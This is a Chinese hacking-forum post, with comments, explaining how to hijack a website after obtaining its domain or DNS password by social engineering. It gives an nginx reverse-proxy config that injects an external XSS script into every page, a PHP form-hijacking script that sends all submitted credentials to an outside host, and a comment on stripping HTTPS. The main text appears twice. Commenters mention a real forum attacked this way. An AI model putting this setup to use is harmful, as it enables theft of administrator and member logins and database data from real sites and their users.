利用反代获取管理员信息与脱裤
思路来源于https://www.t00ls.com/thread-37421-1-1.html
这个帖子里讨论的
假如我们运气好社工到了域名密码
能否做一个类似CND加速代理的东西,把域名解析到我们自己的服务器,然后在我们自己服务器上监控数据截取后台地址及密码等敏感信息
答案肯定是可以的,而且nginx反代是最方便的玩法,但仅仅获取管理密码,会不会太无聊了?
脱裤理论上也是可以的~
这样即使拿不到服务器权限,也可以危害到数据库。
思路大概是这样:
获取到域名或dns权限-配置cname 或者a解析到自己的反代服务器-反代替换所有数据包加入xss代码-获取到登录表单
0x01 nginx反代配置
替换包内容可以用ngx_http_subs_filter_module来解决,效果都是差不多的。
具体的安装过程和普通的三方模块一样
不会的可以参考:http://www.cnblogs.com/dudu/p/nginx-subs_filter.html
安装过程不再赘述
配置
新建一个站点的配置文件,
在/etc/nginx/nginx.config中配置subs_filter
如下内容
server
{
listen 80;
server_name www.反代服务器.com;
location / {
proxy_pass http://www.目标服务器.cn;
proxy_redirect off;
proxy_cache nuget-cache;
proxy_cache_valid 168h;
proxy_ignore_headers Set-Cookie Cache-Control;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
subs_filter 11001072 123456789;
index index.html index.htm index.php;
}
}
这里的subs_filter 11001072是网站上需要替换的代码, 123456789是你想替换上去的内容
一般就替换</body>到<script src=http://xss.net/xss></script></body>
重启nginx服务
systemctl restart nginx
另外 配置文件里有一个 sub_filter_once on | off;
是控制替换次数的 on就会替换一次 off就全部替换 看具体情况而定
0x02 xss代码配置
这里需要用到xss的表单劫持,一般用xss.js就够了。
百度到的xss平台一般都有这个模块,http://webxss.net/ 比如这个。。
或者用一些第三方模块:都可以实现。
0x03 最后
都配置ok之后,再打开目标站的就会自动被解析到我们的反代服务器,然后会员、管理员登录信息就都会被获取到xss平台,可以实现类似脱裤的效果。
成功案例参考:
这个帖子里讨论的
假如我们运气好社工到了域名密码
能否做一个类似CND加速代理的东西,把域名解析到我们自己的服务器,然后在我们自己服务器上监控数据截取后台地址及密码等敏感信息
答案肯定是可以的,而且nginx反代是最方便的玩法,但仅仅获取管理密码,会不会太无聊了?
脱裤理论上也是可以的~
这样即使拿不到服务器权限,也可以危害到数据库。
思路大概是这样:
获取到域名或dns权限-配置cname 或者a解析到自己的反代服务器-反代替换所有数据包加入xss代码-获取到登录表单
0x01 nginx反代配置
替换包内容可以用ngx_http_subs_filter_module来解决,效果都是差不多的。
具体的安装过程和普通的三方模块一样
不会的可以参考:http://www.cnblogs.com/dudu/p/nginx-subs_filter.html
安装过程不再赘述
配置
新建一个站点的配置文件,
在/etc/nginx/nginx.config中配置subs_filter
如下内容
server
{
listen 80;
server_name www.反代服务器.com;
location / {
proxy_pass http://www.目标服务器.cn;
proxy_redirect off;
proxy_cache nuget-cache;
proxy_cache_valid 168h;
proxy_ignore_headers Set-Cookie Cache-Control;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
subs_filter 11001072 123456789;
index index.html index.htm index.php;
}
}
这里的subs_filter 11001072是网站上需要替换的代码, 123456789是你想替换上去的内容
一般就替换</body>到<script src=http://xss.net/xss></script></body>
重启nginx服务
systemctl restart nginx
另外 配置文件里有一个 sub_filter_once on | off;
是控制替换次数的 on就会替换一次 off就全部替换 看具体情况而定
0x02 xss代码配置
这里需要用到xss的表单劫持,一般用xss.js就够了。
百度到的xss平台一般都有这个模块,http://webxss.net/ 比如这个。。
或者用一些第三方模块:
<?php /**
* @desc 转发文件
* @team C0dePlay Team
* @author Yaseng WwW.Yaseng.Me [[email protected]]
*/ ini_set('display_errors', 'Off'); $id=$_GET['id']; if($_GET['y']){ $funcname=$_GET['funcname'];
$formname='"'.$_GET['formname'].'"'; $formid='"'.$_GET['formid'].'"'; echo "
var xurl='http://xxx.sinaapp.com/xxxxx/xform.php?id={$id}';
var form= ( $formname ) ? document.forms[$formname] : document.getElementById($formid);
"; if($funcname){ echo 'function getForm(e){var t,n="",r="",i,s;for(t=0;t<e.length;t++){i=e[t];
if(i.name!=""){if(i.type=="select-one")s=i.options[i.selectedIndex].value;else if(i.type=="checkbox"
||i.type=="radio"){if(i.checked==0)continue;s=i.value}else{if(i.type=="button"||i.type=="submit"
||i.type=="reset"||i.type=="image")continue;s=i.value}s=encodeURIComponent(s),n+=r+i.name+"="+s,r="&"}}return n} '."
$funcname=xss.proxy($funcname,function(){
xss.ajax(xurl,getForm(form));
})" ;
}else{ echo 'xss.xform(form,xurl);';
}
}else{ $url=$_SERVER['HTTP_REFERER']; $data=""; foreach($_REQUEST as $k=>$v){ $data.="|$k=$v";
}
file_get_contents("http://xxx.sinaapp.com/index.php?do=api&id={$id}&data={$data}&url={$url}");
} ?>
0x03 最后
都配置ok之后,再打开目标站的就会自动被解析到我们的反代服务器,然后会员、管理员登录信息就都会被获取到xss平台,可以实现类似脱裤的效果。
成功案例参考:
评论53次
可以在代理机上直接抓包获取数据即可
获取到的包还要重新整理 不方便
原来案例有了,那我删了吧--
删什么了?如果有其他案例 可以发出来呀
我发的就是你分享的拿我论坛做的案例
哈哈哈 你的论坛案例太经典 兄弟
可以在代理机上直接抓包获取数据即可
原来案例有了,那我删了吧--
删什么了?如果有其他案例 可以发出来呀
我发的就是你分享的拿我论坛做的案例
HTTPS无效
还有如果面对HTTPS的站 可以这样玩: subs_filter https http; 如果目标服务器没有选择强制ssl的话 这样也可以攻击https的站
原来案例有了,那我删了吧--
删什么了?如果有其他案例 可以发出来呀
楼主需要投诉管理,是不是discus 普通会员给了编辑帖子权限 而忘记给版主加了这权限
哈哈 投诉我自己嘛
HTTPS无效
去实践一下。。
原来案例有了,那我删了吧--
楼主需要投诉管理,是不是discus 普通会员给了编辑帖子权限 而忘记给版主加了这权限
CEO亲自上阵 社工 偷走域名控制台和主机控制台 + NG反向代理 + XSS钓鱼 高级玩法 很666
http://pan.baidu.com/s/1eRYBJW2 案例在这 不知道为什么编辑不了文章了